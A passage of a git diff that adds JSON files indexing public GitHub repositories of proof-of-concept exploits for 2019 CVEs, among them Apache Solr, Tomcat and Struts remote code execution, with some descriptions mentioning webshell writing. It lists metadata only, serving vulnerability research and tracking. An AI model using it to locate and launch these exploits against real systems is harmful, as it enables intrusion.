"dego905\/Cam", + "owner": { + "login": "dego905", + "id": 75640698, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75640698?v=4", + "html_url": "https:\/\/github.com\/dego905", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dego905\/Cam", + "description": "Este script está creado para mostar usuarios de DVR, VULNERABILIDAD (CVE-2018-9995)", + "fork": false, + "created_at": "2024-05-21T02:11:34Z", + "updated_at": "2024-05-21T02:12:05Z", + "pushed_at": "2024-05-21T02:12:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 819500118, + "name": "CVE-DVr", + "full_name": "A-Alabdoo\/CVE-DVr", + "owner": { + "login": "A-Alabdoo", + "id": 168105244, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168105244?v=4", + "html_url": "https:\/\/github.com\/A-Alabdoo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/A-Alabdoo\/CVE-DVr", + "description": "CVE-2018-9995", + "fork": false, + "created_at": "2024-06-24T16:17:18Z", + "updated_at": "2024-06-24T16:18:33Z", + "pushed_at": "2024-06-24T16:18:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0053.json b/2019/CVE-2019-0053.json new file mode 100644 index 0000000000..c165b01389 --- /dev/null +++ b/2019/CVE-2019-0053.json @@ -0,0 +1,33 @@ +[ + { + "id": 243855333, + "name": "inetutils-CVE-2019-0053-Patched-PKGBUILD", + "full_name": "dreamsmasher\/inetutils-CVE-2019-0053-Patched-PKGBUILD", + "owner": { + "login": "dreamsmasher", + "id": 57917002, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57917002?v=4", + "html_url": "https:\/\/github.com\/dreamsmasher", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dreamsmasher\/inetutils-CVE-2019-0053-Patched-PKGBUILD", + "description": "A patched Arch Linux PKGBUILD to address CVE-2019-0053 (buffer overflow). Downloads and applies a (currently) unreleased patch from upstream.", + "fork": false, + "created_at": "2020-02-28T21:12:43Z", + "updated_at": "2024-08-12T19:58:12Z", + "pushed_at": "2020-02-28T21:24:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0162.json b/2019/CVE-2019-0162.json new file mode 100644 index 0000000000..46b1c83fa7 --- /dev/null +++ b/2019/CVE-2019-0162.json @@ -0,0 +1,33 @@ +[ + { + "id": 288065688, + "name": "SPOILER", + "full_name": "saadislamm\/SPOILER", + "owner": { + "login": "saadislamm", + "id": 40612060, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40612060?v=4", + "html_url": "https:\/\/github.com\/saadislamm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saadislamm\/SPOILER", + "description": "Speculative Load Hazards Boost Rowhammer and Cache Attacks - CVE-2019-0162 - ", + "fork": false, + "created_at": "2020-08-17T02:30:51Z", + "updated_at": "2022-06-18T00:05:27Z", + "pushed_at": "2022-04-04T18:05:23Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0192.json b/2019/CVE-2019-0192.json new file mode 100644 index 0000000000..5cd36bc631 --- /dev/null +++ b/2019/CVE-2019-0192.json @@ -0,0 +1,64 @@ +[ + { + "id": 174814901, + "name": "CVE-2019-0192", + "full_name": "mpgn\/CVE-2019-0192", + "owner": { + "login": "mpgn", + "id": 5891788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mpgn\/CVE-2019-0192", + "description": "RCE on Apache Solr using deserialization of untrusted data via jmx.serviceUrl", + "fork": false, + "created_at": "2019-03-10T11:35:26Z", + "updated_at": "2024-08-12T19:46:33Z", + "pushed_at": "2019-03-10T18:33:43Z", + "stargazers_count": 209, + "watchers_count": 209, + "has_discussions": false, + "forks_count": 57, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 57, + "watchers": 209, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 218993619, + "name": "Solr-RCE-CVE-2019-0192", + "full_name": "Rapidsafeguard\/Solr-RCE-CVE-2019-0192", + "owner": { + "login": "Rapidsafeguard", + "id": 48471397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48471397?v=4", + "html_url": "https:\/\/github.com\/Rapidsafeguard", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rapidsafeguard\/Solr-RCE-CVE-2019-0192", + "description": "Apache Solr remote code execution via dataImportHandler", + "fork": false, + "created_at": "2019-11-01T13:46:37Z", + "updated_at": "2024-08-12T19:54:27Z", + "pushed_at": "2019-11-01T13:58:26Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0193.json b/2019/CVE-2019-0193.json new file mode 100644 index 0000000000..8038f017aa --- /dev/null +++ b/2019/CVE-2019-0193.json @@ -0,0 +1,157 @@ +[ + { + "id": 176290079, + "name": "CVE-2019-0193", + "full_name": "xConsoIe\/CVE-2019-0193", + "owner": { + "login": "xConsoIe", + "id": 48456709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48456709?v=4", + "html_url": "https:\/\/github.com\/xConsoIe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xConsoIe\/CVE-2019-0193", + "description": null, + "fork": false, + "created_at": "2019-03-18T13:18:01Z", + "updated_at": "2024-08-12T19:46:52Z", + "pushed_at": "2019-03-18T13:22:48Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 201405406, + "name": "CVE-2019-0193", + "full_name": "jas502n\/CVE-2019-0193", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-0193", + "description": "Apache Solr DataImport Handler RCE", + "fork": false, + "created_at": "2019-08-09T06:27:39Z", + "updated_at": "2024-08-12T19:51:49Z", + "pushed_at": "2019-08-12T02:23:38Z", + "stargazers_count": 88, + "watchers_count": 88, + "has_discussions": false, + "forks_count": 51, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 51, + "watchers": 88, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 201878363, + "name": "solr_exploit", + "full_name": "1135\/solr_exploit", + "owner": { + "login": "1135", + "id": 19515911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19515911?v=4", + "html_url": "https:\/\/github.com\/1135", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1135\/solr_exploit", + "description": "Apache Solr远程代码执行漏洞(CVE-2019-0193) Exploit", + "fork": false, + "created_at": "2019-08-12T07:17:21Z", + "updated_at": "2024-08-24T03:19:49Z", + "pushed_at": "2020-07-08T06:51:47Z", + "stargazers_count": 63, + "watchers_count": 63, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 63, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 206173868, + "name": "CVE-2019-0193-exp", + "full_name": "jaychouzzk\/CVE-2019-0193-exp", + "owner": { + "login": "jaychouzzk", + "id": 45549315, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45549315?v=4", + "html_url": "https:\/\/github.com\/jaychouzzk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jaychouzzk\/CVE-2019-0193-exp", + "description": null, + "fork": false, + "created_at": "2019-09-03T21:16:24Z", + "updated_at": "2024-08-12T19:52:38Z", + "pushed_at": "2019-09-04T15:40:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 536033583, + "name": "ApacheSolrRCE", + "full_name": "freeFV\/ApacheSolrRCE", + "owner": { + "login": "freeFV", + "id": 32540878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32540878?v=4", + "html_url": "https:\/\/github.com\/freeFV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/freeFV\/ApacheSolrRCE", + "description": "ApacheSolrRCE(CVE-2019-0193)一键写shell,原理是通过代码执行的java文件流写的马。", + "fork": false, + "created_at": "2022-09-13T08:38:30Z", + "updated_at": "2022-09-13T08:37:34Z", + "pushed_at": "2022-09-13T08:24:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0211.json b/2019/CVE-2019-0211.json new file mode 100644 index 0000000000..bc5f1f8354 --- /dev/null +++ b/2019/CVE-2019-0211.json @@ -0,0 +1,33 @@ +[ + { + "id": 186238849, + "name": "Apache-Exploit-2019", + "full_name": "ozkanbilge\/Apache-Exploit-2019", + "owner": { + "login": "ozkanbilge", + "id": 39211596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39211596?v=4", + "html_url": "https:\/\/github.com\/ozkanbilge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ozkanbilge\/Apache-Exploit-2019", + "description": "CVE-2019-0211-apache & CVE-2019-6977-imagecolormatch", + "fork": false, + "created_at": "2019-05-12T10:08:57Z", + "updated_at": "2024-08-12T19:48:48Z", + "pushed_at": "2019-05-12T10:09:35Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 11, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0217.json b/2019/CVE-2019-0217.json new file mode 100644 index 0000000000..0bd8ac1462 --- /dev/null +++ b/2019/CVE-2019-0217.json @@ -0,0 +1,33 @@ +[ + { + "id": 868444855, + "name": "PoC_CVE-2019-0217", + "full_name": "savsch\/PoC_CVE-2019-0217", + "owner": { + "login": "savsch", + "id": 119003089, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119003089?v=4", + "html_url": "https:\/\/github.com\/savsch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/savsch\/PoC_CVE-2019-0217", + "description": null, + "fork": false, + "created_at": "2024-10-06T12:07:55Z", + "updated_at": "2024-10-10T05:05:42Z", + "pushed_at": "2024-10-06T13:39:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0227.json b/2019/CVE-2019-0227.json new file mode 100644 index 0000000000..7235a47a9c --- /dev/null +++ b/2019/CVE-2019-0227.json @@ -0,0 +1,33 @@ +[ + { + "id": 217869109, + "name": "cve-2019-0227", + "full_name": "ianxtianxt\/cve-2019-0227", + "owner": { + "login": "ianxtianxt", + "id": 45796484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45796484?v=4", + "html_url": "https:\/\/github.com\/ianxtianxt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianxtianxt\/cve-2019-0227", + "description": "apache axis1.4远程代码执行漏洞", + "fork": false, + "created_at": "2019-10-27T14:42:54Z", + "updated_at": "2024-08-12T19:54:17Z", + "pushed_at": "2019-10-27T14:51:21Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0230.json b/2019/CVE-2019-0230.json new file mode 100644 index 0000000000..c391b285f9 --- /dev/null +++ b/2019/CVE-2019-0230.json @@ -0,0 +1,164 @@ +[ + { + "id": 287313607, + "name": "CVE-2019-0230", + "full_name": "PrinceFPF\/CVE-2019-0230", + "owner": { + "login": "PrinceFPF", + "id": 11377700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11377700?v=4", + "html_url": "https:\/\/github.com\/PrinceFPF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PrinceFPF\/CVE-2019-0230", + "description": "CVE-2019-0230 Exploit POC", + "fork": false, + "created_at": "2020-08-13T15:18:32Z", + "updated_at": "2024-09-09T06:55:58Z", + "pushed_at": "2020-08-21T07:35:11Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 288948455, + "name": "CVE-2019-0230", + "full_name": "ramoncjs3\/CVE-2019-0230", + "owner": { + "login": "ramoncjs3", + "id": 33519654, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33519654?v=4", + "html_url": "https:\/\/github.com\/ramoncjs3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ramoncjs3\/CVE-2019-0230", + "description": "CVE-2019-0230 & s2-059 poc.", + "fork": false, + "created_at": "2020-08-20T08:21:54Z", + "updated_at": "2022-11-11T03:09:01Z", + "pushed_at": "2020-08-21T12:41:14Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 35, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 306418145, + "name": "CVE-2019-0230-PoC", + "full_name": "f8al\/CVE-2019-0230-PoC", + "owner": { + "login": "f8al", + "id": 7221183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7221183?v=4", + "html_url": "https:\/\/github.com\/f8al", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/f8al\/CVE-2019-0230-PoC", + "description": "PoC for apache struts 2 vuln cve-2019-0230", + "fork": false, + "created_at": "2020-10-22T17:55:10Z", + "updated_at": "2023-02-16T19:34:06Z", + "pushed_at": "2020-10-22T18:31:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "poc", + "python3", + "security-vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 320458800, + "name": "CVE-2019-0230", + "full_name": "Al1ex\/CVE-2019-0230", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2019-0230", + "description": "S2-059(CVE-2019-0230)", + "fork": false, + "created_at": "2020-12-11T03:40:04Z", + "updated_at": "2024-08-12T20:08:22Z", + "pushed_at": "2020-12-11T04:28:10Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-0230", + "s2-059" + ], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 320658849, + "name": "CVE-2019-0230_Struts2S2-059", + "full_name": "tw-eason-tseng\/CVE-2019-0230_Struts2S2-059", + "owner": { + "login": "tw-eason-tseng", + "id": 7005895, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7005895?v=4", + "html_url": "https:\/\/github.com\/tw-eason-tseng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tw-eason-tseng\/CVE-2019-0230_Struts2S2-059", + "description": null, + "fork": false, + "created_at": "2020-12-11T18:57:14Z", + "updated_at": "2021-08-27T17:41:18Z", + "pushed_at": "2020-12-11T19:32:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0232.json b/2019/CVE-2019-0232.json new file mode 100644 index 0000000000..ae843999fd --- /dev/null +++ b/2019/CVE-2019-0232.json @@ -0,0 +1,254 @@ +[ + { + "id": 181439043, + "name": "CVE-2019-0232", + "full_name": "pyn3rd\/CVE-2019-0232", + "owner": { + "login": "pyn3rd", + "id": 41412951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41412951?v=4", + "html_url": "https:\/\/github.com\/pyn3rd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pyn3rd\/CVE-2019-0232", + "description": "Apache Tomcat Remote Code Execution on Windows", + "fork": false, + "created_at": "2019-04-15T07:54:25Z", + "updated_at": "2024-08-12T19:47:56Z", + "pushed_at": "2019-11-27T07:39:40Z", + "stargazers_count": 185, + "watchers_count": 185, + "has_discussions": false, + "forks_count": 55, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 55, + "watchers": 185, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 181706868, + "name": "CVE-2019-0232", + "full_name": "jas502n\/CVE-2019-0232", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-0232", + "description": "Apache Tomcat Remote Code Execution on Windows - CGI-BIN", + "fork": false, + "created_at": "2019-04-16T14:32:03Z", + "updated_at": "2024-09-30T16:46:09Z", + "pushed_at": "2019-04-17T02:42:03Z", + "stargazers_count": 76, + "watchers_count": 76, + "has_discussions": false, + "forks_count": 28, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 28, + "watchers": 76, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 188168912, + "name": "CVE-2019-0232-EXP", + "full_name": "cyy95\/CVE-2019-0232-EXP", + "owner": { + "login": "cyy95", + "id": 16273668, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16273668?v=4", + "html_url": "https:\/\/github.com\/cyy95", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyy95\/CVE-2019-0232-EXP", + "description": null, + "fork": false, + "created_at": "2019-05-23T05:44:29Z", + "updated_at": "2024-08-12T19:49:12Z", + "pushed_at": "2019-05-23T13:13:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 223192188, + "name": "CVE-2019-0232", + "full_name": "setrus\/CVE-2019-0232", + "owner": { + "login": "setrus", + "id": 34648357, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34648357?v=4", + "html_url": "https:\/\/github.com\/setrus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/setrus\/CVE-2019-0232", + "description": "CVE-2019-0232-Remote Code Execution on Apache Tomcat 7.0.42", + "fork": false, + "created_at": "2019-11-21T14:25:39Z", + "updated_at": "2024-09-11T17:27:49Z", + "pushed_at": "2019-11-21T15:03:15Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 340726659, + "name": "Windows-exploitation-Apache-Tomcat-8.5.19-CVE-2019-0232-", + "full_name": "Nicoslo\/Windows-exploitation-Apache-Tomcat-8.5.19-CVE-2019-0232-", + "owner": { + "login": "Nicoslo", + "id": 64541498, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64541498?v=4", + "html_url": "https:\/\/github.com\/Nicoslo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nicoslo\/Windows-exploitation-Apache-Tomcat-8.5.19-CVE-2019-0232-", + "description": null, + "fork": false, + "created_at": "2021-02-20T18:38:48Z", + "updated_at": "2023-02-16T19:34:54Z", + "pushed_at": "2021-02-20T18:44:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 340953590, + "name": "Windows-Exploitation-Web-Server-Tomcat-8.5.39-CVE-2019-0232", + "full_name": "Nicoslo\/Windows-Exploitation-Web-Server-Tomcat-8.5.39-CVE-2019-0232", + "owner": { + "login": "Nicoslo", + "id": 64541498, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64541498?v=4", + "html_url": "https:\/\/github.com\/Nicoslo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nicoslo\/Windows-Exploitation-Web-Server-Tomcat-8.5.39-CVE-2019-0232", + "description": null, + "fork": false, + "created_at": "2021-02-21T16:56:25Z", + "updated_at": "2021-02-22T09:24:02Z", + "pushed_at": "2021-02-22T09:24:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 351562625, + "name": "CVE-2019-0232", + "full_name": "jaiguptanick\/CVE-2019-0232", + "owner": { + "login": "jaiguptanick", + "id": 27203755, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27203755?v=4", + "html_url": "https:\/\/github.com\/jaiguptanick", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jaiguptanick\/CVE-2019-0232", + "description": "Vulnerability analysis and PoC for the Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (RCE)", + "fork": false, + "created_at": "2021-03-25T20:09:54Z", + "updated_at": "2024-08-24T04:48:14Z", + "pushed_at": "2021-09-04T00:45:00Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-0232", + "poc", + "remote-code-execution" + ], + "visibility": "public", + "forks": 9, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 795262800, + "name": "CVE-2019-0232", + "full_name": "xsxtw\/CVE-2019-0232", + "owner": { + "login": "xsxtw", + "id": 168295718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168295718?v=4", + "html_url": "https:\/\/github.com\/xsxtw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xsxtw\/CVE-2019-0232", + "description": null, + "fork": false, + "created_at": "2024-05-02T22:57:58Z", + "updated_at": "2024-05-02T23:00:51Z", + "pushed_at": "2024-05-02T23:00:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0539.json b/2019/CVE-2019-0539.json new file mode 100644 index 0000000000..c8ad2c4332 --- /dev/null +++ b/2019/CVE-2019-0539.json @@ -0,0 +1,33 @@ +[ + { + "id": 196580913, + "name": "CVE-2019-0539", + "full_name": "0x43434343\/CVE-2019-0539", + "owner": { + "login": "0x43434343", + "id": 28482599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28482599?v=4", + "html_url": "https:\/\/github.com\/0x43434343", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x43434343\/CVE-2019-0539", + "description": "R\/W ", + "fork": false, + "created_at": "2019-07-12T13:06:17Z", + "updated_at": "2024-08-12T19:51:00Z", + "pushed_at": "2019-07-12T13:18:22Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0567.json b/2019/CVE-2019-0567.json new file mode 100644 index 0000000000..777b5f546d --- /dev/null +++ b/2019/CVE-2019-0567.json @@ -0,0 +1,64 @@ +[ + { + "id": 720671342, + "name": "Chakra-CVE-2019-0567", + "full_name": "NatteeSetobol\/Chakra-CVE-2019-0567", + "owner": { + "login": "NatteeSetobol", + "id": 6789925, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6789925?v=4", + "html_url": "https:\/\/github.com\/NatteeSetobol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NatteeSetobol\/Chakra-CVE-2019-0567", + "description": "A POC of a type confusion bug in chakracore framework that leads to code execute. ", + "fork": false, + "created_at": "2023-11-19T07:58:34Z", + "updated_at": "2023-11-19T08:02:11Z", + "pushed_at": "2023-11-19T08:06:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855482583, + "name": "CVE-2019-0567-MS-Edge", + "full_name": "NatteeSetobol\/CVE-2019-0567-MS-Edge", + "owner": { + "login": "NatteeSetobol", + "id": 6789925, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6789925?v=4", + "html_url": "https:\/\/github.com\/NatteeSetobol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NatteeSetobol\/CVE-2019-0567-MS-Edge", + "description": "My proof of concept for CVE-2019 Microsoft-Edge", + "fork": false, + "created_at": "2024-09-11T00:04:59Z", + "updated_at": "2024-09-11T00:27:09Z", + "pushed_at": "2024-09-11T00:27:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0604.json b/2019/CVE-2019-0604.json new file mode 100644 index 0000000000..28be29cdf5 --- /dev/null +++ b/2019/CVE-2019-0604.json @@ -0,0 +1,227 @@ +[ + { + "id": 177246255, + "name": "CVE-2019-0604", + "full_name": "linhlhq\/CVE-2019-0604", + "owner": { + "login": "linhlhq", + "id": 28854132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28854132?v=4", + "html_url": "https:\/\/github.com\/linhlhq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/linhlhq\/CVE-2019-0604", + "description": "CVE-2019-0604", + "fork": false, + "created_at": "2019-03-23T05:01:54Z", + "updated_at": "2024-10-24T07:25:48Z", + "pushed_at": "2019-03-22T05:45:44Z", + "stargazers_count": 133, + "watchers_count": 133, + "has_discussions": false, + "forks_count": 84, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 84, + "watchers": 133, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 179413290, + "name": "CVE-2019-0604_sharepoint_CVE", + "full_name": "likekabin\/CVE-2019-0604_sharepoint_CVE", + "owner": { + "login": "likekabin", + "id": 2469038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2469038?v=4", + 